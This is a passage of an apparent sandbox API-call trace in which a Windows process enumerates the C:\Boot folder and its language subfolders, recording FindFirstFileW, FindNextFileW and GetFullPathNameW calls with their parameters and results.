ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0039.124] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0039.125] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0039.126] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.126] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af284) returned 1 [0039.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af290) returned 1 [0039.127] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0039.127] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.127] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.127] CoTaskMemFree (pv=0x4fe370) [0039.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.127] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0039.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.127] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0039.127] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0039.150] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.156] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.156] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.156] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.156] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.156] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.157] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ", lpFilePart=0x0) returned 0xd [0039.157] GetFullPathNameW (in: lpFileName="C:\\Boot\\cs-CZ\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\cs-CZ\\", lpFilePart=0x0) returned 0xe [0039.157] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.157] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.157] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.157] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.157] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.157] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0039.157] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.157] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.158] CoTaskMemFree (pv=0x4fe370) [0039.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.158] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0039.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.158] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0039.158] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0039.158] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.159] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.159] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.159] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.159] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK", lpFilePart=0x0) returned 0xd [0039.159] GetFullPathNameW (in: lpFileName="C:\\Boot\\da-DK\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\da-DK\\", lpFilePart=0x0) returned 0xe [0039.159] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.159] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.160] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.160] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.160] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.160] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0039.160] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.160] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.160] CoTaskMemFree (pv=0x4fe370) [0039.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.160] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0039.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.160] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE", lpFilePart=0x0) returned 0xd [0039.160] GetFullPathNameW (in: lpFileName="C:\\Boot\\de-DE\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\de-DE\\", lpFilePart=0x0) returned 0xe [0039.161] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.180] 